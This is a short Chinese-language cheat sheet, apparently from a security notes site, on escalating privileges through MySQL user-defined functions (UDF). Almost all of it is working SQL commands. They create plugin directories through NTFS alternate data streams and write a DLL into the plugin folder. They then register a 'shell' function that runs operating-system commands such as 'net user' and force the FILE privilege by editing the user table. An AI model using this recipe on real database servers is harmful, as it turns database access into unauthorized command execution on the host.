menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 001-sql提权手工辅助 chevron_right 001-UDF手工提权辅助.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-UDF手工提权辅助.md
    850 B / 2021-07-17 00:01:42
        # UDF手工提权辅助:
    
    ```sql
    select @@basedir;  #查看mysql安装目录
    select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录
    select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录
    select 0xUDFcode into dumpfile 'C:\phpstu\MySQL\lib\plugin\mstlab.dll';  #导出udfcode,注意修改udfcode
    create function cmdshell returns string soname 'mstlab.dll';   #用udf创建cmd函数,shell,sys_exec,sys_eval
    select shell('cmd','net user');     #执行cmd命令
    show variables like '%plugin%';     #查看plugin路径
    
    ```
    
    ## 小技巧:
    
    ```sql
    1.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MySQL 注册表中ImagePath的值为mysql安装目录
    2.my.ini中datadir的值是数据存放目录
    3.UPDATE user set File_priv ='Y';  flush privileges; 强制加file权限
    
    ```
    
    
    
    links
    file_download